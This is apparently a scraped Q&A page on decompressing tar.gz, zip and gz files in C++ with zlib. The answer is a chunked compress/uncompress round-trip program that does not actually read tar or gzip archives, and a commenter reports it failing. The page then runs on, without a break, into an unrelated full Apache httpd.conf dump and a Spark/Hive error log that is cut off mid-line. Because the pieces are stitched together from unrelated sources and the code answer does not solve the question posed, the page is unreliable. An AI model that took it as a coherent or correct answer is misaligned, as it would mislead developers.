How do I decompress files (tar.gz, zip, gz, etc.) in C++?

How do I decompress tar.gz / zip / gz files in C++ on Linux? Can someone give a small example (using the zlib library, perhaps)?

3 answers

#include <cstdio>
#include <cstring>
#include <zlib.h>

int main()
{
    const size_t CHUNK = 512;

    unsigned char *readBuf = new unsigned char[CHUNK];        // input chunk from the source file
    // compress() can expand incompressible input, so the output buffer
    // must hold at least compressBound(CHUNK) bytes.
    uLong boundLen = compressBound(CHUNK);
    unsigned char *compressBuf = new unsigned char[boundLen]; // compressed chunk
    unsigned char *uncompressBuf = new unsigned char[CHUNK];  // round-trip result

    FILE *originalFile   = fopen("/lgw150/temp/src/lg4/original.lg4", "rb");     // the existing file
    FILE *compressedFile = fopen("/lgw150/temp/src/lg4/compressed.lg4", "wb");   // compressed output
    FILE *uncompressFile = fopen("/lgw150/temp/src/lg4/uncompressed.lg4", "wb"); // round-trip output
    if (originalFile == NULL || compressedFile == NULL || uncompressFile == NULL)
    {
        perror("fopen");
        return 1;
    }

    fseek(originalFile, 0, SEEK_END);
    long fileLength = ftell(originalFile);
    fseek(originalFile, 0, SEEK_SET);

    long offset = 0;
    while (offset < fileLength)
    {
        printf("offset=%ld; fileLength=%ld\n", offset, fileLength);

        size_t readLength = fread(readBuf, 1, CHUNK, originalFile);
        if (readLength == 0)
            break;
        offset += (long)readLength;

        // destLen is an in/out parameter: pass the buffer capacity in,
        // and compress() writes the actual compressed size back. Leaving
        // it uninitialized is the usual cause of Z_BUF_ERROR failures.
        uLongf compressBufLength = boundLen;
        int compressValue = compress(compressBuf, &compressBufLength,
                                     readBuf, (uLong)readLength);
        size_t fwriteValue = fwrite(compressBuf, 1, compressBufLength, compressedFile);
        printf("compressValue=%d; fwriteLength=%zu; compressBufLength=%lu; readLength=%zu\n",
               compressValue, fwriteValue, (unsigned long)compressBufLength, readLength);

        // Same in/out convention for uncompress().
        uLongf uncompressLength = CHUNK;
        int uncompressValue = uncompress(uncompressBuf, &uncompressLength,
                                         compressBuf, compressBufLength);
        if (uncompressValue == Z_OK)
            fwrite(uncompressBuf, 1, uncompressLength, uncompressFile);
    }

    fclose(originalFile);
    fclose(compressedFile);
    fclose(uncompressFile);

    delete[] readBuf;
    delete[] compressBuf;
    delete[] uncompressBuf;
    return 0;
}
lp_opai: Isn't there something that decompresses directly?
About 3 years ago · Reply

lp_opai: Are you sure this works? I keep failing.
About 3 years ago · Reply

Just use the command: tar xzvf xxx.tar.gz

# # Example: # LoadModule foo_module modules/mod_foo.so # LoadModule auth_basic_module modules/mod_auth_basic.so LoadModule auth_digest_module modules/mod_auth_digest.so LoadModule authn_file_module modules/mod_authn_file.so LoadModule authn_alias_module modules/mod_authn_alias.so LoadModule authn_anon_module modules/mod_authn_anon.so LoadModule authn_dbm_module modules/mod_authn_dbm.so LoadModule authn_default_module modules/mod_authn_default.so LoadModule authz_host_module modules/mod_authz_host.so LoadModule authz_user_module modules/mod_authz_user.so LoadModule authz_owner_module modules/mod_authz_owner.so LoadModule authz_groupfile_module modules/mod_authz_groupfile.so LoadModule authz_dbm_module modules/mod_authz_dbm.so LoadModule authz_default_module modules/mod_authz_default.so LoadModule ldap_module modules/mod_ldap.so LoadModule authnz_ldap_module modules/mod_authnz_ldap.so LoadModule include_module modules/mod_include.so LoadModule log_config_module modules/mod_log_config.so LoadModule logio_module modules/mod_logio.so LoadModule env_module modules/mod_env.so LoadModule ext_filter_module modules/mod_ext_filter.so LoadModule mime_magic_module modules/mod_mime_magic.so LoadModule expires_module modules/mod_expires.so LoadModule deflate_module modules/mod_deflate.so LoadModule headers_module modules/mod_headers.so LoadModule usertrack_module modules/mod_usertrack.so LoadModule setenvif_module modules/mod_setenvif.so LoadModule mime_module modules/mod_mime.so LoadModule dav_module modules/mod_dav.so LoadModule status_module modules/mod_status.so LoadModule autoindex_module modules/mod_autoindex.so LoadModule info_module modules/mod_info.so LoadModule dav_fs_module modules/mod_dav_fs.so LoadModule vhost_alias_module modules/mod_vhost_alias.so LoadModule negotiation_module modules/mod_negotiation.so LoadModule dir_module modules/mod_dir.so LoadModule actions_module modules/mod_actions.so LoadModule speling_module modules/mod_speling.so LoadModule 
userdir_module modules/mod_userdir.so LoadModule alias_module modules/mod_alias.so LoadModule rewrite_module modules/mod_rewrite.so LoadModule proxy_module modules/mod_proxy.so LoadModule proxy_balancer_module modules/mod_proxy_balancer.so LoadModule proxy_ftp_module modules/mod_proxy_ftp.so LoadModule proxy_http_module modules/mod_proxy_http.so LoadModule proxy_connect_module modules/mod_proxy_connect.so LoadModule cache_module modules/mod_cache.so LoadModule suexec_module modules/mod_suexec.so LoadModule disk_cache_module modules/mod_disk_cache.so LoadModule file_cache_module modules/mod_file_cache.so LoadModule mem_cache_module modules/mod_mem_cache.so LoadModule cgi_module modules/mod_cgi.so LoadModule version_module modules/mod_version.so # # The following modules are not loaded by default: # #LoadModule cern_meta_module modules/mod_cern_meta.so #LoadModule asis_module modules/mod_asis.so # # Load config files from the config directory "/etc/httpd/conf.d". # Include conf.d/*.conf # # ExtendedStatus controls whether Apache will generate "full" status # information (ExtendedStatus On) or just basic information (ExtendedStatus # Off) when the "server-status" handler is called. The default is Off. # #ExtendedStatus On # # If you wish httpd to run as a different user or group, you must run # httpd as root initially and it will switch. # # User/Group: The name (or #number) of the user/group to run httpd as. # . On SCO (ODT 3) use "User nouser" and "Group nogroup". # . On HPUX you may not be able to use shared memory as nobody, and the # suggested workaround is to create a user www and use that user. # NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET) # when the value of (unsigned)Group is above 60000; # don't use Group #-1 on these systems! 
# User apache Group apache ### Section 2: 'Main' server configuration # # The directives in this section set up the values used by the 'main' # server, which responds to any requests that aren't handled by a # <VirtualHost> definition. These values also provide defaults for # any <VirtualHost> containers you may define later in the file. # # All of these directives may appear inside <VirtualHost> containers, # in which case these default settings will be overridden for the # virtual host being defined. # # # ServerAdmin: Your address, where problems with the server should be # e-mailed. This address appears on some server-generated pages, such # as error documents. e.g. admin@your-domain.com # ServerAdmin root@localhost # # ServerName gives the name and port that the server uses to identify itself. # This can often be determined automatically, but we recommend you specify # it explicitly to prevent problems during startup. # # If this is not set to valid DNS name for your host, server-generated # redirections will not work. See also the UseCanonicalName directive. # # If your host doesn't have a registered DNS name, enter its IP address here. # You will have to access it by its address anyway, and this will make # redirections work in a sensible way. # #ServerName www.example.com:80 # eric add ServerName my-ip!!!! # eric add end # # UseCanonicalName: Determines how Apache constructs self-referencing # URLs and the SERVER_NAME and SERVER_PORT variables. # When set "Off", Apache will use the Hostname and Port supplied # by the client. When set "On", Apache will use the value of the # ServerName directive. # UseCanonicalName Off # # DocumentRoot: The directory out of which you will serve your # documents. By default, all requests are taken from this directory, but # symbolic links and aliases may be used to point to other locations. 
# DocumentRoot "/var/www/html" # # Each directory to which Apache has access can be configured with respect # to which services and features are allowed and/or disabled in that # directory (and its subdirectories). # # First, we configure the "default" to be a very restrictive set of # features. # <Directory /> Options FollowSymLinks AllowOverride None </Directory> # # Note that from this point forward you must specifically allow # particular features to be enabled - so if something's not working as # you might expect, make sure that you have specifically enabled it # below. # # # This should be changed to whatever you set DocumentRoot to. # <Directory "/var/www/html"> # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both complicated and important. Please see # http://httpd.apache.org/docs/2.2/mod/core.html#options # for more information. # Options Indexes FollowSymLinks # # AllowOverride controls what directives may be placed in .htaccess files. # It can be "All", "None", or any combination of the keywords: # Options FileInfo AuthConfig Limit # AllowOverride None # # Controls who can get stuff from this server. # Order allow,deny Allow from all #Deny from all </Directory> # # UserDir: The name of the directory that is appended onto a user's home # directory if a ~user request is received. # # The path to the end user account 'public_html' directory must be # accessible to the webserver userid. This usually means that ~userid # must have permissions of 711, ~userid/public_html must have permissions # of 755, and documents contained therein must be world-readable. # Otherwise, the client will only receive a "403 Forbidden" message. 
# # See also: http://httpd.apache.org/docs/misc/FAQ.html#forbidden # <IfModule mod_userdir.c> # # UserDir is disabled by default since it can confirm the presence # of a username on the system (depending on home directory # permissions). # UserDir disable # # To enable requests to /~user/ to serve the user's public_html # directory, remove the "UserDir disable" line above, and uncomment # the following line instead: # #UserDir public_html </IfModule> # # Control access to UserDir directories. The following is an example # for a site where these directories are restricted to read-only. # #<Directory /home/*/public_html> # AllowOverride FileInfo AuthConfig Limit # Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec # <Limit GET POST OPTIONS> # Order allow,deny # Allow from all # </Limit> # <LimitExcept GET POST OPTIONS> # Order deny,allow # Deny from all # </LimitExcept> #</Directory> # # DirectoryIndex: sets the file that Apache will serve if a directory # is requested. # # The index.html.var file (a type-map) is used to deliver content- # negotiated documents. The MultiViews Option can be used for the # same purpose, but it is much slower. # DirectoryIndex index.html index.html.var # # AccessFileName: The name of the file to look for in each directory # for additional configuration directives. See also the AllowOverride # directive. # AccessFileName .htaccess # # The following lines prevent .htaccess and .htpasswd files from being # viewed by Web clients. # <Files ~ "^\.ht"> Order allow,deny Deny from all </Files> # # TypesConfig describes where the mime.types file (or equivalent) is # to be found. # TypesConfig /etc/mime.types # # DefaultType is the default MIME type the server will use for a document # if it cannot otherwise determine one, such as from filename extensions. # If your server contains mostly text or HTML documents, "text/plain" is # a good value. 
If most of your content is binary, such as applications # or images, you may want to use "application/octet-stream" instead to # keep browsers from trying to display binary files as though they are # text. # DefaultType text/plain # # The mod_mime_magic module allows the server to use various hints from the # contents of the file itself to determine its type. The MIMEMagicFile # directive tells the module where the hint definitions are located. # <IfModule mod_mime_magic.c> # MIMEMagicFile /usr/share/magic.mime MIMEMagicFile conf/magic </IfModule> # # HostnameLookups: Log the names of clients or just their IP addresses # e.g., www.apache.org (on) or 204.62.129.132 (off). # The default is off because it'd be overall better for the net if people # had to knowingly turn this feature on, since enabling it means that # each client request will result in AT LEAST one lookup request to the # nameserver. # HostnameLookups Off # # EnableMMAP: Control whether memory-mapping is used to deliver # files (assuming that the underlying OS supports it). # The default is on; turn this off if you serve from NFS-mounted # filesystems. On some systems, turning it off (regardless of # filesystem) can improve performance; for details, please see # http://httpd.apache.org/docs/2.2/mod/core.html#enablemmap # #EnableMMAP off # # EnableSendfile: Control whether the sendfile kernel support is # used to deliver files (assuming that the OS supports it). # The default is on; turn this off if you serve from NFS-mounted # filesystems. Please see # http://httpd.apache.org/docs/2.2/mod/core.html#enablesendfile # #EnableSendfile off # # ErrorLog: The location of the error log file. # If you do not specify an ErrorLog directive within a <VirtualHost> # container, error messages relating to that virtual host will be # logged here. If you *do* define an error logfile for a <VirtualHost> # container, that host's errors will be logged there and not here. 
# ErrorLog logs/error_log # # LogLevel: Control the number of messages logged to the error_log. # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. # LogLevel warn # # The following directives define some format nicknames for use with # a CustomLog directive (see below). # LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s %b" common LogFormat "%{Referer}i -> %U" referer LogFormat "%{User-agent}i" agent # "combinedio" includes actual counts of actual bytes received (%I) and sent (%O); this # requires the mod_logio module to be loaded. #LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio # # The location and format of the access logfile (Common Logfile Format). # If you do not define any access logfiles within a <VirtualHost> # container, they will be logged here. Contrariwise, if you *do* # define per-<VirtualHost> access logfiles, transactions will be # logged therein and *not* in this file. # #CustomLog logs/access_log common # # If you would like to have separate agent and referer logfiles, uncomment # the following directives. # #CustomLog logs/referer_log referer #CustomLog logs/agent_log agent # # For a single logfile with access, agent, and referer information # (Combined Logfile Format), use the following directive: # CustomLog logs/access_log combined # # Optionally add a line containing the server version and virtual host # name to server-generated pages (internal error documents, FTP directory # listings, mod_status and mod_info output etc., but not CGI generated # documents or custom error documents). # Set to "EMail" to also include a mailto: link to the ServerAdmin. # Set to one of: On | Off | EMail # ServerSignature On # # Aliases: Add here as many aliases as you need (with no limit). 
The format is # Alias fakename realname # # Note that if you include a trailing / on fakename then the server will # require it to be present in the URL. So "/icons" isn't aliased in this # example, only "/icons/". If the fakename is slash-terminated, then the # realname must also be slash terminated, and if the fakename omits the # trailing slash, the realname must also omit it. # # We include the /icons/ alias for FancyIndexed directory listings. If you # do not use FancyIndexing, you may comment this out. # Alias /icons/ "/var/www/icons/" <Directory "/var/www/icons"> Options Indexes MultiViews AllowOverride None Order allow,deny Allow from all </Directory> # # WebDAV module configuration section. # <IfModule mod_dav_fs.c> # Location of the WebDAV lock database. DAVLockDB /var/lib/dav/lockdb </IfModule> # # ScriptAlias: This controls which directories contain server scripts. # ScriptAliases are essentially the same as Aliases, except that # documents in the realname directory are treated as applications and # run by the server when requested rather than as documents sent to the client. # The same rules about trailing "/" apply to ScriptAlias directives as to # Alias. # ScriptAlias /cgi-bin/ "/var/www/cgi-bin/" # # "/var/www/cgi-bin" should be changed to whatever your ScriptAliased # CGI directory exists, if you have that configured. # <Directory "/var/www/cgi-bin"> AllowOverride None Options None Order allow,deny Allow from all </Directory> # # Redirect allows you to tell clients about documents which used to exist in # your server's namespace, but do not anymore. This allows you to tell the # clients where to look for the relocated document. # Example: # Redirect permanent /foo http://www.example.com/bar # # Directives controlling the display of server-generated directory listings. # # # IndexOptions: Controls the appearance of server-generated directory # listings. 
# IndexOptions FancyIndexing VersionSort NameWidth=* HTMLTable # # AddIcon* directives tell the server which icon to show for different # files or filename extensions. These are only displayed for # FancyIndexed directories. # AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip AddIconByType (TXT,/icons/text.gif) text/* AddIconByType (IMG,/icons/image2.gif) image/* AddIconByType (SND,/icons/sound2.gif) audio/* AddIconByType (VID,/icons/movie.gif) video/* AddIcon /icons/binary.gif .bin .exe AddIcon /icons/binhex.gif .hqx AddIcon /icons/tar.gif .tar AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip AddIcon /icons/a.gif .ps .ai .eps AddIcon /icons/layout.gif .html .shtml .htm .pdf AddIcon /icons/text.gif .txt AddIcon /icons/c.gif .c AddIcon /icons/p.gif .pl .py AddIcon /icons/f.gif .for AddIcon /icons/dvi.gif .dvi AddIcon /icons/uuencoded.gif .uu AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl AddIcon /icons/tex.gif .tex AddIcon /icons/bomb.gif core AddIcon /icons/back.gif .. AddIcon /icons/hand.right.gif README AddIcon /icons/folder.gif ^^DIRECTORY^^ AddIcon /icons/blank.gif ^^BLANKICON^^ # # DefaultIcon is which icon to show for files which do not have an icon # explicitly set. # DefaultIcon /icons/unknown.gif # # AddDescription allows you to place a short description after a file in # server-generated indexes. These are only displayed for FancyIndexed # directories. # Format: AddDescription "description" filename # #AddDescription "GZIP compressed document" .gz #AddDescription "tar archive" .tar #AddDescription "GZIP compressed tar archive" .tgz # # ReadmeName is the name of the README file the server will look for by # default, and append to directory listings. # # HeaderName is the name of a file which should be prepended to # directory indexes. 
ReadmeName README.html HeaderName HEADER.html # # IndexIgnore is a set of filenames which directory indexing should ignore # and not include in the listing. Shell-style wildcarding is permitted. # IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t # # DefaultLanguage and AddLanguage allows you to specify the language of # a document. You can then use content negotiation to give a browser a # file in a language the user can understand. # # Specify a default language. This means that all data # going out without a specific language tag (see below) will # be marked with this one. You probably do NOT want to set # this unless you are sure it is correct for all cases. # # * It is generally better to not mark a page as # * being a certain language than marking it with the wrong # * language! # # DefaultLanguage nl # # Note 1: The suffix does not have to be the same as the language # keyword --- those with documents in Polish (whose net-standard # language code is pl) may wish to use "AddLanguage pl .po" to # avoid the ambiguity with the common suffix for perl scripts. # # Note 2: The example entries below illustrate that in some cases # the two character 'Language' abbreviation is not identical to # the two character 'Country' code for its country, # E.g. 'Danmark/dk' versus 'Danish/da'. # # Note 3: In the case of 'ltz' we violate the RFC by using a three char # specifier. There is 'work in progress' to fix this and get # the reference data for rfc1766 cleaned up. 
# # Catalan (ca) - Croatian (hr) - Czech (cs) - Danish (da) - Dutch (nl) # English (en) - Esperanto (eo) - Estonian (et) - French (fr) - German (de) # Greek-Modern (el) - Hebrew (he) - Italian (it) - Japanese (ja) # Korean (ko) - Luxembourgeois* (ltz) - Norwegian Nynorsk (nn) # Norwegian (no) - Polish (pl) - Portugese (pt) # Brazilian Portuguese (pt-BR) - Russian (ru) - Swedish (sv) # Simplified Chinese (zh-CN) - Spanish (es) - Traditional Chinese (zh-TW) # AddLanguage ca .ca AddLanguage cs .cz .cs AddLanguage da .dk AddLanguage de .de AddLanguage el .el AddLanguage en .en AddLanguage eo .eo AddLanguage es .es AddLanguage et .et AddLanguage fr .fr AddLanguage he .he AddLanguage hr .hr AddLanguage it .it AddLanguage ja .ja AddLanguage ko .ko AddLanguage ltz .ltz AddLanguage nl .nl AddLanguage nn .nn AddLanguage no .no AddLanguage pl .po AddLanguage pt .pt AddLanguage pt-BR .pt-br AddLanguage ru .ru AddLanguage sv .sv AddLanguage zh-CN .zh-cn AddLanguage zh-TW .zh-tw # # LanguagePriority allows you to give precedence to some languages # in case of a tie during content negotiation. # # Just list the languages in decreasing order of preference. We have # more or less alphabetized them here. You probably want to change this. # LanguagePriority en ca cs da de el eo es et fr he hr it ja ko ltz nl nn no pl pt pt-BR ru sv zh-CN zh-TW # # ForceLanguagePriority allows you to serve a result page rather than # MULTIPLE CHOICES (Prefer) [in case of a tie] or NOT ACCEPTABLE (Fallback) # [in case no accepted languages matched the available variants] # ForceLanguagePriority Prefer Fallback # # Specify a default charset for all content served; this enables # interpretation of all content as UTF-8 by default. 
To use the # default browser choice (ISO-8859-1), or to allow the META tags # in HTML content to override this choice, comment out this # directive: # AddDefaultCharset UTF-8 # # AddType allows you to add to or override the MIME configuration # file mime.types for specific file types. # #AddType application/x-tar .tgz # # AddEncoding allows you to have certain browsers uncompress # information on the fly. Note: Not all browsers support this. # Despite the name similarity, the following Add* directives have nothing # to do with the FancyIndexing customization directives above. # #AddEncoding x-compress .Z #AddEncoding x-gzip .gz .tgz # If the AddEncoding directives above are commented-out, then you # probably should define those extensions to indicate media types: # AddType application/x-compress .Z AddType application/x-gzip .gz .tgz # # AddHandler allows you to map certain file extensions to "handlers": # actions unrelated to filetype. These can be either built into the server # or added with the Action directive (see below) # # To use CGI scripts outside of ScriptAliased directories: # (You will also need to add "ExecCGI" to the "Options" directive.) # #AddHandler cgi-script .cgi # # For files that include their own HTTP headers: # #AddHandler send-as-is asis # # For type maps (negotiated resources): # (This is enabled by default to allow the Apache "It Worked" page # to be distributed in multiple languages.) # AddHandler type-map var # # Filters allow you to process content before it is sent to the client. # # To parse .shtml files for server-side includes (SSI): # (You will also need to add "Includes" to the "Options" directive.) # AddType text/html .shtml AddOutputFilter INCLUDES .shtml # # Action lets you define media types that will execute a script whenever # a matching file is called. This eliminates the need for repeated URL # pathnames for oft-used CGI file processors. 
# Format: Action media/type /cgi-script/location # Format: Action handler-name /cgi-script/location # # # Customizable error responses come in three flavors: # 1) plain text 2) local redirects 3) external redirects # # Some examples: #ErrorDocument 500 "The server made a boo boo." #ErrorDocument 404 /missing.html #ErrorDocument 404 "/cgi-bin/missing_handler.pl" #ErrorDocument 402 http://www.example.com/subscription_info.html # # # Putting this all together, we can internationalize error responses. # # We use Alias to redirect any /error/HTTP_<error>.html.var response to # our collection of by-error message multi-language collections. We use # includes to substitute the appropriate text. # # You can modify the messages' appearance without changing any of the # default HTTP_<error>.html.var files by adding the line: # # Alias /error/include/ "/your/include/path/" # # which allows you to create your own set of files by starting with the # /var/www/error/include/ files and # copying them to /your/include/path/, even on a per-VirtualHost basis. 
# Alias /error/ "/var/www/error/" <IfModule mod_negotiation.c> <IfModule mod_include.c> <Directory "/var/www/error"> AllowOverride None Options IncludesNoExec AddOutputFilter Includes html AddHandler type-map var Order allow,deny Allow from all LanguagePriority en es de fr ForceLanguagePriority Prefer Fallback </Directory> # ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var # ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var # ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var # ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var # ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var # ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var # ErrorDocument 410 /error/HTTP_GONE.html.var # ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var # ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var # ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var # ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var # ErrorDocument 415 /error/HTTP_UNSUPPORTED_MEDIA_TYPE.html.var # ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var # ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var # ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var # ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var # ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var </IfModule> </IfModule> # # The following directives modify normal HTTP response behavior to # handle known problems with browser implementations. # BrowserMatch "Mozilla/2" nokeepalive BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 BrowserMatch "RealPlayer 4\.0" force-response-1.0 BrowserMatch "Java/1\.0" force-response-1.0 BrowserMatch "JDK/1\.0" force-response-1.0 # # The following directive disables redirects on non-GET requests for # a directory that does not include the trailing slash. This fixes a # problem with Microsoft WebFolders which does not appropriately handle # redirects for folders with DAV methods. 
# Same deal with Apple's DAV filesystem and Gnome VFS support for DAV. # BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully BrowserMatch "MS FrontPage" redirect-carefully BrowserMatch "^WebDrive" redirect-carefully BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully BrowserMatch "^gnome-vfs/1.0" redirect-carefully BrowserMatch "^XML Spy" redirect-carefully BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully # # Allow server status reports generated by mod_status, # with the URL of http://servername/server-status # Change the ".example.com" to match your domain to enable. # #<Location /server-status> # SetHandler server-status # Order deny,allow # Deny from all # Allow from .example.com #</Location> # # Allow remote server configuration reports, with the URL of # http://servername/server-info (requires that mod_info.c be loaded). # Change the ".example.com" to match your domain to enable. # #<Location /server-info> # SetHandler server-info # Order deny,allow # Deny from all # Allow from .example.com #</Location> # # Proxy Server directives. Uncomment the following lines to # enable the proxy server: # #<IfModule mod_proxy.c> #ProxyRequests On # #<Proxy *> # Order deny,allow # Deny from all # Allow from .example.com #</Proxy> # # Enable/disable the handling of HTTP/1.1 "Via:" headers. # ("Full" adds the server version; "Block" removes all outgoing Via: headers) # Set to one of: Off | On | Full | Block # #ProxyVia On # # To enable a cache of proxied content, uncomment the following lines. # See http://httpd.apache.org/docs/2.2/mod/mod_cache.html for more details. # #<IfModule mod_disk_cache.c> # CacheEnable disk / # CacheRoot "/var/cache/mod_proxy" #</IfModule> # #</IfModule> # End of proxy directives. ### Section 3: Virtual Hosts # # VirtualHost: If you want to maintain multiple domains/hostnames on your # machine you can setup VirtualHost containers for them. 
Most configurations # use only name-based virtual hosts so the server doesn't need to worry about # IP addresses. This is indicated by the asterisks in the directives below. # # Please see the documentation at # <URL:http://httpd.apache.org/docs/2.2/vhosts/> # for further details before you try to setup virtual hosts. # # You may use the command line option '-S' to verify your virtual host # configuration. # # Use name-based virtual hosting. # #NameVirtualHost *:80 # # NOTE: NameVirtualHost cannot be used without a port specifier # (e.g. :80) if mod_ssl is being used, due to the nature of the # SSL protocol. # # # VirtualHost example: # Almost any Apache directive may go into a VirtualHost container. # The first VirtualHost section is used for requests without a known # server name. # #<VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com # DocumentRoot /www/docs/dummy-host.example.com # ServerName dummy-host.example.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common #</VirtualHost>
Spark can't reach the Hive metastore and can't see the databases
Here is the exception directly:
```
Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties
SLF4J: Class path contains multiple SLF4J bindings.
SLF4J: Found binding in [jar:file:/data01/hadoop/yarn/local/filecache/355/spark2-hdp-yarn-archive.tar.gz/slf4j-log4j12-1.7.16.jar!/org/slf4j/impl/StaticLoggerBinder.class]
SLF4J: Found binding in [jar:file:/usr/hdp/2.6.5.0-292/hadoop/lib/slf4j-log4j12-1.7.10.jar!/org/slf4j/impl/StaticLoggerBinder.class]
SLF4J: See http://www.slf4j.org/codes.html#multiple_bindings for an explanation.
SLF4J: Actual binding is of type [org.slf4j.impl.Log4jLoggerFactory]
19/08/13 19:53:17 INFO SignalUtils: Registered signal handler for TERM
19/08/13 19:53:17 INFO SignalUtils: Registered signal handler for HUP
19/08/13 19:53:17 INFO SignalUtils: Registered signal handler for INT
19/08/13 19:53:17 INFO SecurityManager: Changing view acls to: yarn,hdfs
19/08/13 19:53:17 INFO SecurityManager: Changing modify acls to: yarn,hdfs
19/08/13 19:53:17 INFO SecurityManager: Changing view acls groups to:
19/08/13 19:53:17 INFO SecurityManager: Changing modify acls groups to:
19/08/13 19:53:17 INFO SecurityManager: SecurityManager: authentication disabled; ui acls disabled; users with view permissions: Set(yarn, hdfs); groups with view permissions: Set(); users with modify permissions: Set(yarn, hdfs); groups with modify permissions: Set()
19/08/13 19:53:18 INFO ApplicationMaster: Preparing Local resources
19/08/13 19:53:19 INFO ApplicationMaster: ApplicationAttemptId: appattempt_1565610088533_0087_000001
19/08/13 19:53:19 INFO ApplicationMaster: Starting the user application in a separate Thread
19/08/13 19:53:19 INFO ApplicationMaster: Waiting for spark context initialization...
19/08/13 19:53:19 INFO SparkContext: Running Spark version 2.3.0.2.6.5.0-292
19/08/13 19:53:19 INFO SparkContext: Submitted application: voice_stream
19/08/13 19:53:19 INFO SecurityManager: Changing view acls to: yarn,hdfs
19/08/13 19:53:19 INFO SecurityManager: Changing modify acls to: yarn,hdfs
19/08/13 19:53:19 INFO SecurityManager: Changing view acls groups to:
19/08/13 19:53:19 INFO SecurityManager: Changing modify acls groups to:
19/08/13 19:53:19 INFO SecurityManager: SecurityManager: authentication disabled; ui acls disabled; users with view permissions: Set(yarn, hdfs); groups with view permissions: Set(); users with modify permissions: Set(yarn, hdfs); groups with modify permissions: Set()
19/08/13 19:53:19 INFO Utils: Successfully started service 'sparkDriver' on port 20410.
19/08/13 19:53:19 INFO SparkEnv: Registering MapOutputTracker
19/08/13 19:53:19 INFO SparkEnv: Registering BlockManagerMaster
19/08/13 19:53:19 INFO BlockManagerMasterEndpoint: Using org.apache.spark.storage.DefaultTopologyMapper for getting topology information
19/08/13 19:53:19 INFO BlockManagerMasterEndpoint: BlockManagerMasterEndpoint up
19/08/13 19:53:19 INFO DiskBlockManager: Created local directory at /data01/hadoop/yarn/local/usercache/hdfs/appcache/application_1565610088533_0087/blockmgr-94d35b97-43b2-496e-a4cb-73ecd3ed186c
19/08/13 19:53:19 INFO MemoryStore: MemoryStore started with capacity 366.3 MB
19/08/13 19:53:19 INFO SparkEnv: Registering OutputCommitCoordinator
19/08/13 19:53:19 INFO JettyUtils: Adding filter: org.apache.hadoop.yarn.server.webproxy.amfilter.AmIpFilter
19/08/13 19:53:19 INFO Utils: Successfully started service 'SparkUI' on port 28852.
19/08/13 19:53:19 INFO SparkUI: Bound SparkUI to 0.0.0.0, and started at http://datanode02:28852
19/08/13 19:53:19 INFO YarnClusterScheduler: Created YarnClusterScheduler
19/08/13 19:53:20 INFO SchedulerExtensionServices: Starting Yarn extension services with app application_1565610088533_0087 and attemptId Some(appattempt_1565610088533_0087_000001)
19/08/13 19:53:20 INFO Utils: Successfully started service 'org.apache.spark.network.netty.NettyBlockTransferService' on port 31984.
19/08/13 19:53:20 INFO NettyBlockTransferService: Server created on datanode02:31984
19/08/13 19:53:20 INFO BlockManager: Using org.apache.spark.storage.RandomBlockReplicationPolicy for block replication policy
19/08/13 19:53:20 INFO BlockManagerMaster: Registering BlockManager BlockManagerId(driver, datanode02, 31984, None)
19/08/13 19:53:20 INFO BlockManagerMasterEndpoint: Registering block manager datanode02:31984 with 366.3 MB RAM, BlockManagerId(driver, datanode02, 31984, None)
19/08/13 19:53:20 INFO BlockManagerMaster: Registered BlockManager BlockManagerId(driver, datanode02, 31984, None)
19/08/13 19:53:20 INFO BlockManager: Initialized BlockManager: BlockManagerId(driver, datanode02, 31984, None)
19/08/13 19:53:20 INFO EventLoggingListener: Logging events to hdfs:/spark2-history/application_1565610088533_0087_1
19/08/13 19:53:20 INFO ApplicationMaster: ===============================================================================
YARN executor launch context:
  env:
    CLASSPATH ->
